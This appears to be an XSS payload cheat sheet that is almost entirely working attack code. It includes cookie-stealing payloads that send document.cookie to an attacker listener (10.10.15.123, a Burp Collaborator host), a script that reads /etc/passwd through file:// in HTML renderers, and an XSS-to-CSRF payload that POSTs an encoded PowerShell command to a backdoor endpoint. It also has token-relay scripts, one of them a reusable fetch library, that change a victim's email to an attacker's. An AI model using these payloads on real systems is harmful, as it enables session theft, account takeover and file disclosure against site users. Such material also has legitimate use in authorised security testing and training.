XSS
Cross-Site Scripting
Ultimate checker, a single probe that closes a single- or double-quoted attribute, closes the tag, and calls print() (a visible dialog that filters block less often than alert):
'"/><script>print()</script>

Redirections

Meta refresh needs no JavaScript, so it survives filters that only strip <script> and on* handlers; the target is your own host:

<head>
<meta http-equiv="refresh" content="0; URL=http://www.example.com/" />
</head>

Data Grabbers

Cookies

document.cookie only exposes cookies set without the HttpOnly flag; check the Set-Cookie headers first. 10.10.15.123 and the Collaborator host stand for the attacker's listener.

Img tag (GET; the cookie string is base64-encoded so ';' and spaces survive the URL):
<img src="x" onerror="this.src='http://10.10.15.123/?c='+btoa(document.cookie)">
Fetch (POST; mode 'no-cors' sends the request without a preflight, the opaque response is not needed):
<script>
fetch('https://<SESSION>.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>

XMLHttpRequest

XSS to LFI

Only works when the injected markup is rendered from a file:// origin or by a renderer with the same-origin policy disabled (server-side HTML-to-PDF converters and headless browsers that load attacker-controlled HTML are the usual case); a normal http(s) page cannot read file:// URLs. The file contents are written into the rendered output:

<script>
var xhr = new XMLHttpRequest();
xhr.onload = function() {
document.write(this.responseText);
};
xhr.onerror = function() {
document.write('read of file:///etc/passwd failed');
};
xhr.open("GET", "file:///etc/passwd");
xhr.send();
</script>
One-liner:
<script>x=new XMLHttpRequest();x.onload=function(){document.write(this.responseText);};x.open("GET","file:///etc/passwd");x.send();</script>

XSS to CSRF

The payload runs in the victim's origin, so every request it makes is same-origin: cookies are attached, CORS does not apply, and an endpoint reachable only from localhost or only by the victim's role becomes reachable through the victim's browser. If the endpoint is accessible only from localhost:
<script>
var xhr;
if (window.XMLHttpRequest) {
xhr = new XMLHttpRequest();
} else {
xhr = new ActiveXObject("Microsoft.XMLHTTP"); // legacy IE fallback only
}
xhr.open("POST", "/backdoor.php");
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send("cmd=powershell -enc ...");
</script>
With capturing the CSRF token first: GET the page that embeds the token, extract it, then POST the state change. The form-urlencoded Content-Type matters, because XHR sends a string body as text/plain by default and the server's form parser would ignore it:
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('GET', '/email', true);
req.send();
function handleResponse() {
var m = this.responseText.match(/name="csrf" value="(\w+)"/);
if (!m) return; // token field not found in the response
var token = m[1];
var changeReq = new XMLHttpRequest();
changeReq.open('POST', '/email/change-email', true);
changeReq.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
changeReq.send('csrf=' + encodeURIComponent(token) + '&email=' + encodeURIComponent('<ATTACKER_EMAIL>'));
};
</script>
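The token-relay pattern of the snippet above, generalised, as an added example that is not part of the original notes: a token extractor that tolerates either attribute order and quote style, a form encoder that escapes every key and value, and a fetch-based driver. The paths (/email, /email/change-email) and field names (csrf, email) are taken from the snippet; <ATTACKER_EMAIL> is a placeholder.

```javascript
// Added example (not from the original notes): reusable XSS-to-CSRF token relay.

// Pull the anti-CSRF token out of a page. Accepts name/value in either order and
// either quote style, e.g.
//   <input type="hidden" name="csrf" value="abc">   or   <input value='abc' name='csrf'>
// Returns null when no such field exists, so the caller can bail out instead of
// sending a request that the server will reject.
function extractCsrfToken(html, fieldName = 'csrf') {
  const q = `["']`;
  const re = new RegExp(
    `name=${q}${fieldName}${q}[^>]*value=${q}([^"']+)${q}` +
    `|value=${q}([^"']+)${q}[^>]*name=${q}${fieldName}${q}`, 'i');
  const m = html.match(re);
  return m ? (m[1] || m[2]) : null;
}

// application/x-www-form-urlencoded body. Every key and value is escaped so
// tokens or addresses containing '&', '=' or '+' survive the trip.
function formEncode(params) {
  return Object.entries(params)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v))
    .join('&');
}

// Browser side: GET the page that carries the token, then POST the state change.
// Both requests are same-origin, so the victim's cookies go along automatically;
// credentials: 'include' is set explicitly for the case where the payload is
// served from a sibling subdomain.
async function csrfViaXss(tokenPage, action, params, fieldName = 'csrf') {
  const page = await fetch(tokenPage, { credentials: 'include' });
  const token = extractCsrfToken(await page.text(), fieldName);
  if (token === null) throw new Error('no ' + fieldName + ' field found in ' + tokenPage);
  return fetch(action, {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: formEncode({ [fieldName]: token, ...params }),
  });
}

// Payload body equivalent to the XHR version above (placeholder address assumed):
//   csrfViaXss('/email', '/email/change-email', { email: '<ATTACKER_EMAIL>' });
```

The regex is deliberately narrow: it only matches a token field whose name is exactly the requested one, so a page that also carries csrf_other or a second form does not yield the wrong value.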